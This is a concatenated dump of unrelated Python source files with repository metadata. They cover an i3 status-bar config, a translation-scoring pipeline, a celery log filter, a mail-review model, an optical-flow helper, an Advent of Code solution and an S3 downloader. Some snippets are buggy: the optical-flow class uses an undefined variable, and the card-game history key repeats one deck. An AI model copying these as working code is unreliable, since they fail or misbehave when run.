logging.basicConfig(filename=Path.home() / ".i3pyblocks.log", level=logging.DEBUG)
# Helper to find partitions, filtering some that we don't want to show
# Will be used later on the DiskUsageBlock
def partitions(excludes=("/boot", "/nix/store")):
    """Return mounted disk partitions, minus the mountpoints in *excludes*."""
    mounted = psutil.disk_partitions()
    return [part for part in mounted if part.mountpoint not in excludes]
async def main():
    """Register every status-bar block on a Runner and start it."""
    # Create a Runner instance, so we can register the modules
    runner = Runner()

    # Show the current i3 focused window title
    # Using `.format()` (https://pyformat.info/) to limit the number of
    # characters to 41
    await runner.register_block(i3ipc.WindowTitleBlock(format=" {window_title:.41s}"))

    # Show the current network speed for either en* (ethernet) or wl* devices
    # Limiting the interface name to only 2 characters since it can get quite
    # verbose
    await runner.register_block(
        ps.NetworkSpeedBlock(
            format_up=" {interface:.2s}: {upload} {download}",
            format_down="",
            interface_regex="en*|wl*",
        )
    )

    # For each partition found, add it to the Runner
    # Using `{{short_path}}` shows only the first letter of the path
    # i.e.: /mnt/backup -> /m/b
    for partition in partitions():
        await runner.register_block(
            ps.DiskUsageBlock(
                format=" {short_path}: {free:.1f}GiB",
                path=partition.mountpoint,
            )
        )

    await runner.register_block(ps.VirtualMemoryBlock(format=" {available:.1f}GiB"))

    # Using custom icons to show the temperature visually
    # So when the temperature is above 75, is shown, when it is above 50,
    # is shown, etc
    # Needs Font Awesome 5 installed
    await runner.register_block(
        ps.SensorsTemperaturesBlock(
            format="{icon} {current:.0f}°C",
            icons={
                0: "",
                25: "",
                50: "",
                75: "",
            },
        )
    )

    await runner.register_block(
        ps.CpuPercentBlock(format=" {percent}%"),
    )

    # Load only makes sense depending of the number of CPUs installed in
    # machine, so get the number of CPUs here and calculate the color mapping
    # dynamically
    cpu_count = psutil.cpu_count()
    await runner.register_block(
        ps.LoadAvgBlock(
            format=" {load1}",
            colors={
                0: types.Color.NEUTRAL,
                cpu_count / 2: types.Color.WARN,
                cpu_count: types.Color.URGENT,
            },
        ),
    )

    await runner.register_block(
        ps.SensorsBatteryBlock(
            format_plugged=" {percent:.0f}%",
            format_unplugged="{icon} {percent:.0f}% {remaining_time}",
            format_unknown="{icon} {percent:.0f}%",
            icons={
                0: "",
                10: "",
                25: "",
                50: "",
                75: "",
            },
        )
    )

    # ToggleBlock works by running the command specified in `command_state`,
    # if it returns any text it will show `format_on`, otherwise `format_off`
    # is shown
    # When `format_on` is being shown, clicking on it runs `command_off`,
    # while when `format_off` is being shown, clicking on it runs `command_on`
    # We are using it below to simulate the popular Caffeine extension in
    # Gnome and macOS
    # await runner.register_block(
    #     shell.ToggleBlock(
    #         command_state="xset q | grep -Fo 'DPMS is Enabled'",
    #         command_on="xset s on +dpms",
    #         command_off="xset s off -dpms",
    #         format_on=" ",
    #         format_off=" ",
    #     )
    # )

    # This is equivalent to the example above, but using pure Python
    await runner.register_block(
        x11.CaffeineBlock(
            format_on=" ",
            format_off=" ",
        )
    )

    # KbddBlock uses D-Bus to get the keyboard layout information updates, so
    # it is very efficient (i.e.: there is no polling). But it needs `kbdd`
    # installed and running: https://github.com/qnikst/kbdd
    # Using mouse buttons or scroll here allows you to cycle between the layouts
    # By default the resulting string is very big (i.e.: 'English (US, intl.)'),
    # so we lowercase it using '!l' and truncate it to the first two letters
    # using ':.2s', resulting in `en`
    # You could also use '!u' to UPPERCASE it instead
    await runner.register_block(
        dbus.KbddBlock(
            format=" {full_layout!l:.2s}",
        )
    )

    # MediaPlayerBlock listen for updates in your player (in this case Spotify)
    await runner.register_block(dbus.MediaPlayerBlock(player="spotify"))

    # In case of `kbdd` isn't available for you, here is a alternative using
    # ShellBlock and `xkblayout-state` program. ShellBlock just show the output
    # of `command` (if it is empty this block is hidden)
    # `command_on_click` runs some command when the mouse click is captured,
    # in this case when the user scrolls up or down
    # await runner.register_block(
    #     shell.ShellBlock(
    #         command="xkblayout-state print %s",
    #         format=" {output}",
    #         command_on_click={
    #             types.MouseButton.SCROLL_UP: "xkblayout-state set +1",
    #             types.MouseButton.SCROLL_DOWN: "xkblayout-state set -1",
    #         },
    #     )
    # )

    # By default BacklightBlock showns a message "No backlight found" when
    # there is no backlight
    # We set to empty instead, so when no backlight is available (i.e.
    # desktop), we hide this block
    await runner.register_block(
        inotify.BacklightBlock(
            format=" {percent:.0f}%",
            format_no_backlight="",
            command_on_click={
                types.MouseButton.SCROLL_UP: "light -A 5%",
                types.MouseButton.SCROLL_DOWN: "light -U 5",
            },
        )
    )

    # `signals` allows us to send multiple signals that this block will
    # listen and do something
    # In this case, we can force update the module when the volume changes,
    # for example, by running:
    # $ pactl set-sink-volume @DEFAULT_SINK@ +5% && pkill -SIGUSR1 example.py
    await runner.register_block(
        pulse.PulseAudioBlock(
            format=" {volume:.0f}%",
            format_mute=" mute",
        ),
        signals=(signal.SIGUSR1, signal.SIGUSR2),
    )

    # RequestsBlock do a HTTP request to an url. We are using it here to show
    # the current weather for location, using
    # https://github.com/chubin/wttr.in#one-line-output
    # For more complex requests, we can also pass a custom async function
    # `response_callback`, that receives the response of the HTTP request and
    # you can manipulate it the way you want
    await runner.register_block(
        http.PollingRequestBlock(
            "https://wttr.in/?format=%c+%t",
            format_error="",
            sleep=60 * 60,
        ),
    )

    # You can use Pango markup for more control over text formating, as the
    # example below shows
    # For a description of how you can customize, look:
    # https://developer.gnome.org/pango/stable/pango-Markup.html
    await runner.register_block(
        datetime.DateTimeBlock(
            format_time=utils.pango_markup(" %T", font_weight="bold"),
            format_date=utils.pango_markup(" %a, %d/%m", font_weight="light"),
            default_state={"markup": types.MarkupText.PANGO},
        )
    )

    # Start the Runner instance
    await runner.start()
if __name__ == "__main__":
# Start the i3pyblocks
asyncio.run(main())
| 34.219409 | 87 | 0.606165 | 0 | 0 | 0 | 0 | 0 | 0 | 7,330 | 0.89576 | 4,642 | 0.567274 |
33b1e4daad97a94cb573d3a29eb181822c6e57a2 | 9,131 | py | Python | context_nmt/pipelines/context_indicators_generator.py | jesa7955/context-translation | 3cb1f4fdcf5a6829eea02d6008c4c4d7ba5ad993 | [
"MIT"
] | 2 | 2020-01-22T05:18:19.000Z | 2021-11-14T17:18:46.000Z | context_nmt/pipelines/context_indicators_generator.py | jesa7955/context-translation | 3cb1f4fdcf5a6829eea02d6008c4c4d7ba5ad993 | [
"MIT"
] | 1 | 2020-03-31T11:03:22.000Z | 2020-03-31T11:03:22.000Z | context_nmt/pipelines/context_indicators_generator.py | jesa7955/context-translation | 3cb1f4fdcf5a6829eea02d6008c4c4d7ba5ad993 | [
"MIT"
] | null | null | null | import collections
import logging
import json
import os
import luigi
import gokart
import tqdm
import torch
import sentencepiece as spm
import sacrebleu
import MeCab
from fairseq.models.transformer import TransformerModel
from fairseq.data import LanguagePairDataset
from context_nmt.pipelines.conversation_dataset_merger import (
MergeMultipleDataset,
CONCAT_TOKEN,
)
logger = logging.getLogger("luigi-interface")
class GenerateContextIndicator(gokart.TaskOnKart):
    """Score context choices for each sentence of a parallel document set.

    For every sentence pair above ``score_threhold``, the task translates the
    source sentence with several context-aware models (one per "context bias",
    i.e. how far back the contextual sentence is; bias -1 means no context)
    and records, per bias: the negated sentence BLEU of the translation and
    the per-sentence loss / nll_loss of the reference under the model. The
    resulting nested dict {doc_id: {sent_id: {metric: {bias: value}}}} is
    dumped as the task output.
    """

    task_namespace = "context_nmt"
    split_name = luigi.Parameter()
    dataset_names = luigi.ListParameter()
    source_paths = luigi.ListParameter()
    source_lang = luigi.Parameter()
    target_lang = luigi.Parameter()
    # Mapping of context bias -> fairseq checkpoint path.
    context_aware_translation_models = luigi.DictParameter()
    context_aware_sentencepiece_model = luigi.Parameter()
    max_source_positions = luigi.IntParameter(default=128)
    max_target_positions = luigi.IntParameter(default=128)
    max_sentences = luigi.IntParameter(default=128)
    sentence_translation_model_name = luigi.Parameter(default=None)
    sentence_translation_models = luigi.DictParameter(default={})
    sentence_sentencepiece_models = luigi.DictParameter(default={})
    # Minimum alignment score for a sentence pair to be used.
    # NOTE: name kept as-is ("threhold", sic) — it is part of the task's
    # parameter interface.
    score_threhold = luigi.FloatParameter(default=0.3)

    def requires(self):
        """Depend on the merged multi-dataset for this split."""
        return MergeMultipleDataset(
            split_name=self.split_name,
            dataset_names=self.dataset_names,
            source_paths=self.source_paths,
            translation_model_name=self.sentence_translation_model_name,
            translation_models=self.sentence_translation_models,
            sentencepiece_models=self.sentence_sentencepiece_models,
        )

    def output(self):
        """Pickle target named after split, language pair and model name."""
        name_components = [
            self.split_name,
            self.source_lang,
            self.target_lang,
            self.sentence_translation_model_name,
        ]
        return self.make_target("_".join(name_components) + "_context_indicators.pkl")

    def run(self):
        def tokenize_for_bleu(target):
            # Decode sentencepiece pieces back to plain text; for Japanese,
            # retokenize with MeCab so BLEU is computed over morphemes
            # (parse() output is one "surface\tfeatures" line per token,
            # with EOS and an empty line at the end — hence [:-2]).
            target = tokenizer.decode_pieces(target.split())
            if self.target_lang == "ja":
                target = " ".join(
                    map(
                        lambda x: x.split("\t")[0],
                        tagger.parse(target).split("\n")[:-2],
                    )
                )
            return target

        docs = self.load()
        tagger = MeCab.Tagger()
        tokenizer = spm.SentencePieceProcessor()
        tokenizer.load(self.context_aware_sentencepiece_model)
        # Load one fp16 CUDA model per context bias.
        translation_models = {}
        for bias, path in self.context_aware_translation_models.items():
            base_path, checkpoint_path = os.path.split(path)
            model = (
                TransformerModel.from_pretrained(
                    base_path, checkpoint_file=checkpoint_path
                )
                .half()
                .cuda()
                .eval()
            )
            model.args.max_source_positions = self.max_source_positions
            model.args.max_target_positions = self.max_target_positions
            translation_models[int(bias)] = model
        # args/task/criterion come from the context-free (bias -1) model;
        # assumes all checkpoints share a compatible configuration —
        # TODO confirm.
        args = translation_models[-1].args
        task = translation_models[-1].task
        criterion = task.build_criterion(args)
        results = collections.defaultdict(dict)
        for doc_id, doc in tqdm.tqdm(docs.items(), total=len(docs)):
            # Sentence ids whose alignment score passes the threshold.
            parallel_doc = set(
                [
                    sent_id
                    for sent_id, score in doc["pairs"]
                    if score >= self.score_threhold
                ]
            )
            batches = collections.defaultdict(dict)
            targets = {}
            for sent_id in parallel_doc:
                source, target = [
                    tokenizer.encode_as_pieces(doc[lang][sent_id])
                    for lang in (self.source_lang, self.target_lang)
                ]
                # Earlier sentences with non-empty source text are context
                # candidates.
                available_index = [
                    index for index in range(0, sent_id) if doc[self.source_lang][index]
                ]
                # context_bias is the parameter which the model is trained with.
                # context_sent_index is the index of the actual used contextual
                # sentence.
                targets[sent_id] = " ".join(target)
                for context_bias, _ in translation_models.items():
                    context_sent_index = None
                    if context_bias != -1:
                        if len(available_index) < context_bias:
                            # Not enough history: fall back to the document's
                            # last sentence (index -1).
                            context_sent_index = -1
                        else:
                            context_sent_index = available_index[-context_bias]
                        source_context = tokenizer.encode_as_pieces(
                            docs[doc_id][self.source_lang][context_sent_index]
                        )
                        real_source = source_context + [CONCAT_TOKEN] + source
                    else:
                        real_source = source
                    # Skip empty or over-long inputs (marked as None).
                    if real_source and len(real_source) < self.max_source_positions:
                        source_sentence = " ".join(real_source)
                    else:
                        source_sentence = None
                    batches[context_bias][sent_id] = source_sentence
            batch_results = collections.defaultdict(
                lambda: collections.defaultdict(dict)
            )
            for context_bias, batch in batches.items():
                data = [sentence for sentence in batch.values() if sentence]
                if not data:
                    continue
                real_targets = {
                    sent_id: targets[sent_id] for sent_id in batch if batch[sent_id]
                }
                model = translation_models[context_bias]
                args.max_source_positions = self.max_source_positions
                args.max_target_positions = self.max_target_positions
                translated = model.translate(data)
                # Compute BLEU score
                # Make the BLEU negative to easy the results computaion
                for trans, (sent_id, target) in zip(translated, real_targets.items()):
                    batch_results[sent_id]["bleu"][
                        context_bias
                    ] = -sacrebleu.corpus_bleu(
                        tokenize_for_bleu(trans), tokenize_for_bleu(target)
                    ).score
                # Compute loss
                src_tokens = [
                    model.src_dict.encode_line(
                        real_source,
                        line_tokenizer=lambda x: x.split(),
                        add_if_not_exist=False,
                    ).long()
                    for real_source in data
                ]
                src_lengths = [tokens.numel() for tokens in src_tokens]
                tgt_tokens = [
                    model.tgt_dict.encode_line(
                        target,
                        line_tokenizer=lambda x: x.split(),
                        add_if_not_exist=False,
                    ).long()
                    for target in real_targets.values()
                ]
                tgt_lengths = [tokens.numel() for tokens in tgt_tokens]
                temp_dataset = LanguagePairDataset(
                    src_tokens,
                    src_lengths,
                    model.src_dict,
                    tgt_tokens,
                    tgt_lengths,
                    left_pad_source=args.left_pad_source,
                    left_pad_target=args.left_pad_target,
                    max_source_positions=self.max_source_positions,
                    max_target_positions=self.max_target_positions,
                )
                reports = collections.defaultdict(list)
                iterator = task.get_batch_iterator(
                    dataset=temp_dataset, max_sentences=self.max_sentences,
                )
                for sample in iterator.next_epoch_itr(shuffle=False):
                    sample["net_input"]["src_tokens"] = sample["net_input"][
                        "src_tokens"
                    ].cuda()
                    sample["net_input"]["src_lengths"] = sample["net_input"][
                        "src_lengths"
                    ].cuda()
                    sample["net_input"]["prev_output_tokens"] = sample["net_input"][
                        "prev_output_tokens"
                    ].cuda()
                    sample["target"] = sample["target"].cuda()
                    with torch.no_grad():
                        _, _, report = criterion(model.models[0], sample, False)
                    for key, value in report.items():
                        reports[key].append(value)
                # NOTE(review): this assumes the batch iterator preserves the
                # order of real_targets so the zip below aligns losses with
                # sentence ids — confirm.
                for key in ("loss", "nll_loss"):
                    for value, (sent_id, _) in zip(
                        torch.cat(reports[key]), real_targets.items()
                    ):
                        batch_results[sent_id][key][context_bias] = float(value)
            for sent_id, value in batch_results.items():
                results[doc_id][sent_id] = value
        self.dump(dict(results))
| 42.868545 | 88 | 0.54419 | 8,702 | 0.953017 | 0 | 0 | 0 | 0 | 0 | 0 | 507 | 0.055525 |
33b33555cc6216929a203498dda0d15a42f493e0 | 855 | py | Python | log_task_id.py | Sendhub/flashk_util | fe42c117be6a9e9655e38cd48a3104b6144873ba | [
"BSD-3-Clause"
] | null | null | null | log_task_id.py | Sendhub/flashk_util | fe42c117be6a9e9655e38cd48a3104b6144873ba | [
"BSD-3-Clause"
] | 1 | 2016-01-20T22:13:53.000Z | 2016-01-20T22:13:53.000Z | log_task_id.py | Sendhub/flashk_util | fe42c117be6a9e9655e38cd48a3104b6144873ba | [
"BSD-3-Clause"
] | null | null | null | import logging
from celery._state import get_current_task
class TaskIDFilter(logging.Filter):
    """Logging filter that stamps celery task context onto log records.

    While a celery task is executing, ``task_name`` and ``task_id`` are
    copied from the current task; otherwise both attributes are defaulted
    to empty strings.

    https://docs.python.org/2/howto/logging-cookbook.html
    #using-filters-to-impart-contextual-information
    """

    def filter(self, record):
        """Attach task_name/task_id to *record*; always keep the record."""
        task = get_current_task()
        request = getattr(task, 'request', None) if task else None
        if request:
            record.__dict__.update(task_id=request.id, task_name=task.name)
        else:
            record.__dict__.setdefault('task_name', '')
            record.__dict__.setdefault('task_id', '')
        return True
| 27.580645 | 74 | 0.612865 | 794 | 0.928655 | 0 | 0 | 0 | 0 | 0 | 0 | 387 | 0.452632 |
33b43ed36a9638956d846bca8d46fb665ecc2a68 | 2,295 | py | Python | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | 18 | 2020-06-05T18:17:40.000Z | 2022-03-11T23:25:21.000Z | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | #coding=utf-8
import os
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from apps.core.models import Customer
# Automatic check verdicts for a mail (labels are Chinese):
# 高危邮件 = high-risk mail, 发件黑 = sender blacklisted, 内容黑 = content
# keyword blacklisted, 主题黑 = subject blacklisted, 主题和内容关键字 =
# subject-and-content keywords, 垃邮 = spam, 检测出错 = check error,
# 发件人黑名单 = customer sender blacklist.
CHECK_RESULT = (
    ('', '--'),
    ('high_risk', u'高危邮件'),
    ('sender_blacklist', u'发件黑'),
    ('keyword_blacklist', u'内容黑'),
    ('subject_blacklist', u'主题黑'),
    ('subject_and_keyword', u'主题和内容关键字'),
    ('cyber_spam', u'CYBER-Spam'),
    ('spamassassin', u'垃邮(spamassassin)'),
    ('error', u'检测出错'),
    ('c_sender_blacklist', u'发件人黑名单'),
)

# Review workflow states: 等待审核 = awaiting review, 审核已通过 = approved,
# 审核已拒绝 = rejected, 审核通过中 = approving, 审核拒绝中 = rejecting.
MAIL_STATE = (
    ('', '--'),
    ('review', u'等待审核'),
    ('pass', u'审核已通过'),
    ('reject', u'审核已拒绝'),
    ('passing', u'审核通过中'),
    ('rejecting', u'审核拒绝中'),
)

# Origin of the captured mail: 网关 = gateway, 中继 = relay.
MAIL_ORIGIN = (
    ('', '--'),
    ('collect', u'网关'),
    ('relay', u'中继'),
)
class LocalizedMail(models.Model):
    """A captured mail held for (or processed by) manual review.

    The mail body itself is stored on disk under
    ``settings.DATA_LOCALIZED_PATH/<pk>``; only metadata lives in the
    database.
    """

    # Owning customer (row kept if the customer is deleted: DO_NOTHING).
    customer = models.ForeignKey(Customer, on_delete=models.DO_NOTHING, null=True, blank=True)
    # Verdict of the automatic check (see CHECK_RESULT) and its details.
    check_result = models.CharField(u'检测结果', max_length=20, null=True, blank=True, choices=CHECK_RESULT, db_index=True)
    check_message = models.TextField(u'检测详细结果', null=True, blank=True)
    created = models.DateTimeField(u'创建日期', auto_now_add=True)
    # Envelope sender / recipient and subject.
    mail_from = models.CharField(u'发件人', max_length=150, null=True, blank=True)
    mail_to = models.CharField(u'收件人', max_length=150, null=True, blank=True)
    subject = models.CharField(u'主题', max_length=800, null=True, blank=True)
    # Review workflow state (see MAIL_STATE).
    state = models.CharField(u'状态', max_length=20, default='review', choices=MAIL_STATE, db_index=True)
    # Mail size in bytes.
    size = models.IntegerField(u'邮件大小', default=0)
    # Reviewer and when the review decision was made.
    reviewer = models.ForeignKey(User, on_delete=models.DO_NOTHING, null=True, blank=True)
    review_time = models.DateTimeField(u'审核时间', null=True, blank=True)
    # Customer-side mail id and origin (gateway capture vs relay).
    mail_id = models.CharField(u'客户邮件ID', max_length=20, null=True, blank=True)
    origin = models.CharField(u'来源', max_length=20, choices=MAIL_ORIGIN, default='collect', db_index=True)
    created_date = models.DateField(u'创建日期', auto_now_add=True, db_index=True)

    def get_mail_content(self):
        """Return the raw mail content from disk, or '' if the file is gone."""
        file_path = self.get_mail_path()
        if not os.path.exists(file_path):
            return ''
        # Use a context manager so the file handle is always closed; the
        # original left the open handle to the garbage collector.
        with open(file_path, 'r') as mail_file:
            return mail_file.read()

    def get_mail_path(self):
        """Return the on-disk path of this mail's content file."""
        # Removed a leftover debug ``print`` of the path.
        return os.path.join(settings.DATA_LOCALIZED_PATH, str(self.id))
| 38.898305 | 119 | 0.67756 | 1,612 | 0.644542 | 0 | 0 | 0 | 0 | 0 | 0 | 671 | 0.268293 |
33b740adf83b98dff3bbdd2ad1fbbad7dd39228a | 2,691 | py | Python | src/softfab/pages/InspectDone.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | 20 | 2019-02-07T17:03:04.000Z | 2020-03-16T20:45:19.000Z | src/softfab/pages/InspectDone.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | 36 | 2019-02-11T08:57:16.000Z | 2020-09-29T05:32:08.000Z | src/softfab/pages/InspectDone.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | null | null | null | # SPDX-License-Identifier: BSD-3-Clause
from typing import ClassVar, Mapping, cast
from softfab.ControlPage import ControlPage
from softfab.Page import InvalidRequest, PageProcessor
from softfab.pageargs import DictArg, EnumArg, StrArg
from softfab.pagelinks import TaskIdArgs
from softfab.request import Request
from softfab.response import Response
from softfab.resultcode import ResultCode
from softfab.resultlib import ResultStorage
from softfab.tasktables import TaskProcessorMixin
from softfab.users import User, checkPrivilege, checkPrivilegeForOwned
from softfab.xmlgen import xml
class InspectDone_POST(ControlPage['InspectDone_POST.Arguments',
                                   'InspectDone_POST.Processor']):
    """Control-API endpoint that records a manual inspection result
    for a task run that is waiting for inspection.
    """

    class Arguments(TaskIdArgs):
        # Inspector's verdict, optional free-form summary and optional
        # mid-level data values to store alongside the result.
        result = EnumArg(ResultCode)
        summary = StrArg(None)
        data = DictArg(StrArg())

    class Processor(TaskProcessorMixin,
                    PageProcessor['InspectDone_POST.Arguments']):
        resultStorage: ClassVar[ResultStorage]

        async def process(self,
                          req: Request['InspectDone_POST.Arguments'],
                          user: User
                          ) -> None:
            """Validate the request and store the inspection result.

            Raises InvalidRequest if the task is not awaiting inspection
            or the verdict is not OK/WARNING/ERROR.
            """
            # Fetch and check job and task.
            self.initTask(req)
            job = self.job
            task = self.task
            taskName = task.getName()
            taskRun = task.getLatestRun()
            if not taskRun.isWaitingForInspection():
                raise InvalidRequest(
                    'Given task is not waiting for inspection'
                    )
            # Check result and summary.
            result = req.args.result
            if result not in (
                ResultCode.OK, ResultCode.WARNING, ResultCode.ERROR
                ):
                raise InvalidRequest(f'Invalid inspection result "{result}"')
            summary = req.args.summary
            # Check store permissions.
            checkPrivilegeForOwned(user, 't/m', job)
            # Store mid-level data, if any.
            data = cast(Mapping[str, str], req.args.data)
            if data:
                self.resultStorage.putData(taskName, taskRun.getId(), data)
            # Store inspection result.
            job.inspectDone(taskName, result, summary)

    def checkAccess(self, user: User) -> None:
        # Error messages might leak info about job/task existence, so make sure
        # at least read-only access is allowed.
        # The processor will do additional checks.
        checkPrivilege(user, 'j/l')
        checkPrivilege(user, 't/l')

    async def writeReply(self, response: Response, proc: Processor) -> None:
        # Minimal success reply: <ok/>.
        response.writeXML(xml.ok)
| 36.364865 | 79 | 0.623932 | 2,097 | 0.779264 | 0 | 0 | 0 | 0 | 1,361 | 0.50576 | 540 | 0.200669 |
33b8da2d72ef09ad6eef64de8e3cb74d42aa9d37 | 414 | py | Python | src/uwds3_core/estimation/dense_optical_flow_estimator.py | underworlds-robot/uwds3_core | 3aec39f83ec5ba2c0b70485aa23bf6eeaedeeda7 | [
"MIT"
] | 1 | 2021-06-08T02:55:15.000Z | 2021-06-08T02:55:15.000Z | src/uwds3_core/estimation/dense_optical_flow_estimator.py | underworlds-robot/uwds3_core | 3aec39f83ec5ba2c0b70485aa23bf6eeaedeeda7 | [
"MIT"
] | null | null | null | src/uwds3_core/estimation/dense_optical_flow_estimator.py | underworlds-robot/uwds3_core | 3aec39f83ec5ba2c0b70485aa23bf6eeaedeeda7 | [
"MIT"
] | null | null | null | import cv2
class DenseOpticalFlowEstimator(object):
def __init__(self):
self.previous_frame = None
def estimate(self, frame):
if first_frame is None:
return None
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
flow = cv2.calcOpticalFlowFarneback(self.previous_frame, gray, None, 0.5, 1, 20, 1, 5, 1.2, 0)
self.previous_frame = gray
return flow
| 27.6 | 102 | 0.644928 | 400 | 0.966184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33bb74b917e15d0d3580148ef539ee108a577454 | 2,071 | py | Python | 2020/day-22/day-22.py | mrMetalWood/advent-of-code | b850aa50474c622e23e924c5da53775b4cae05b2 | [
"MIT"
] | 1 | 2018-12-02T12:38:31.000Z | 2018-12-02T12:38:31.000Z | 2020/day-22/day-22.py | mrMetalWood/advent-of-code | b850aa50474c622e23e924c5da53775b4cae05b2 | [
"MIT"
] | 7 | 2020-07-16T14:03:31.000Z | 2020-12-02T10:46:49.000Z | 2020/day-22/day-22.py | mrMetalWood/advent-of-code | b850aa50474c622e23e924c5da53775b4cae05b2 | [
"MIT"
] | null | null | null | import os
from copy import deepcopy
with open(os.path.join(os.path.dirname(__file__), "input.txt"), "r") as file:
lines = [l.strip() for l in file.readlines()]
p1 = list(reversed([int(i) for i in lines[1:26]]))
p2 = list(reversed([int(i) for i in lines[28:]]))
def part1(player1, player2):
while player1 and player2:
p1_card = player1.pop()
p2_card = player2.pop()
if p1_card > p2_card:
player1.insert(0, p1_card)
player1.insert(0, p2_card)
else:
player2.insert(0, p2_card)
player2.insert(0, p1_card)
winning_player = player1 or player2
ans = 0
for idx, card in enumerate(winning_player):
ans += (idx + 1) * card
return ans
def part2(player1, player2):
def game(pl1, pl2):
history = set()
while pl1 and pl2:
current = "".join([str(i) for i in pl1]) + "".join([str(i) for i in pl1])
if current in history:
return "p1"
else:
history.add(current)
p1_card = pl1.pop()
p2_card = pl2.pop()
winner = ""
if len(pl1) >= p1_card and len(pl2) >= p2_card:
winner = game(deepcopy(pl1[-p1_card:]), deepcopy(pl2[-p2_card:]))
else:
if p1_card > p2_card:
winner = "p1"
else:
winner = "p2"
if winner == "p1":
pl1.insert(0, p1_card)
pl1.insert(0, p2_card)
else:
pl2.insert(0, p2_card)
pl2.insert(0, p1_card)
return "p1" if pl1 else "p2"
winning_player = game(player1, player2)
if winning_player == "p1":
winning_player = player1
else:
winning_player = player2
ans = 0
for idx, card in enumerate(winning_player):
ans += (idx + 1) * card
return ans
print(f"Part 1: {part1(deepcopy(p1), deepcopy(p2))}") # 35202
print(f"Part 2: {part2(deepcopy(p1), deepcopy(p2))}") # 32317
| 27.25 | 85 | 0.522453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.07436 |
33bd39e35c4992a15a6d443f02ff02fed9014dd8 | 2,075 | py | Python | Exercise05/5-30.py | ywyz/IntroducingToProgrammingUsingPython | 614d59eacb7e37aece871a00f7d1518f7de88708 | [
"Apache-2.0"
] | null | null | null | Exercise05/5-30.py | ywyz/IntroducingToProgrammingUsingPython | 614d59eacb7e37aece871a00f7d1518f7de88708 | [
"Apache-2.0"
] | null | null | null | Exercise05/5-30.py | ywyz/IntroducingToProgrammingUsingPython | 614d59eacb7e37aece871a00f7d1518f7de88708 | [
"Apache-2.0"
] | null | null | null | '''
@Date: 2019-11-02 09:19:19
@Author: ywyz
@LastModifiedBy: ywyz
@Github: https://github.com/ywyz
@LastEditors: ywyz
@LastEditTime: 2019-11-02 10:13:44
'''
year = eval(input("Enter the year: "))
day = eval(input("Enter the day of the week: "))
for months in range(1, 13):
if months == 1:
month = "January"
dayOfMonths = 31
firstday = day
elif months == 2:
month = "February"
if (year % 400 == 0 or (year % 4 == 0 and year % 100 != 0)):
dayOfMonths = 29
else:
dayOfMonths = 28
elif months == 3:
month = "March"
dayOfMonths = 31
elif months == 4:
month = "April"
dayOfMonths = 30
elif months == 5:
month = "May"
dayOfMonths = 31
elif months == 6:
month = "June"
dayOfMonths = 30
elif months == 7:
month = "July"
dayOfMonths = 31
elif months == 8:
month = "Augest"
dayOfMonths = 31
elif months == 9:
month = "September"
dayOfMonths = 30
elif months == 10:
month = "October"
dayOfMonths = 31
elif months == 11:
month = "November"
dayOfMonths = 30
elif months == 12:
month = "December"
dayOfMonths = 31
if firstday == 1:
dayOfWeek = "Monday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 2:
dayOfWeek = "Tuesday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 3:
dayOfWeek = "Wednesday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 4:
dayOfWeek = "Thursday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 5:
dayOfWeek = "Friday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 6:
dayOfWeek = "Saturday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 0:
dayOfWeek = "Sunday"
print(month, " . 1", year, "is ", dayOfWeek)
firstday = (firstday + dayOfMonths) % 7
| 26.948052 | 68 | 0.52 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 443 | 0.213494 |
33be9763c347a4744c14215a01a14f94308620b5 | 587 | py | Python | insights_messaging/downloaders/s3.py | dpensi/insights-core-messaging | a964cecdf5cbb57407dae9e9208a31fc5e9318e4 | [
"Apache-2.0"
] | 6 | 2019-12-12T14:19:30.000Z | 2020-04-08T16:20:04.000Z | insights_messaging/downloaders/s3.py | dpensi/insights-core-messaging | a964cecdf5cbb57407dae9e9208a31fc5e9318e4 | [
"Apache-2.0"
] | 14 | 2020-01-27T17:04:39.000Z | 2021-03-16T15:18:30.000Z | insights_messaging/downloaders/s3.py | dpensi/insights-core-messaging | a964cecdf5cbb57407dae9e9208a31fc5e9318e4 | [
"Apache-2.0"
] | 13 | 2019-12-16T09:32:38.000Z | 2021-05-05T12:39:38.000Z | import shutil
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
from s3fs import S3FileSystem
class S3Downloader:
def __init__(self, tmp_dir=None, chunk_size=16 * 1024, **kwargs):
self.tmp_dir = tmp_dir
self.chunk_size = chunk_size
self.fs = S3FileSystem(**kwargs)
@contextmanager
def get(self, src):
with self.fs.open(src) as s:
with NamedTemporaryFile(dir=self.tmp_dir) as d:
shutil.copyfileobj(s, d, length=self.chunk_size)
d.flush()
yield d.name
| 26.681818 | 69 | 0.647359 | 460 | 0.783646 | 236 | 0.402044 | 256 | 0.436116 | 0 | 0 | 0 | 0 |
33bea67e17e2e48816f3acbadb4afec665fa95a1 | 142 | py | Python | Code/hypers.py | taoqi98/KIM | dc897026d5a639a9a554d06ac036b121fcbcf6a0 | [
"MIT"
] | 7 | 2021-08-13T12:43:17.000Z | 2022-03-24T11:25:52.000Z | Code/hypers.py | JulySinceAndrew/KIM-SIGIR-2021 | 87b1c21f79a5389cc4a0d122e7ded5f63a63da28 | [
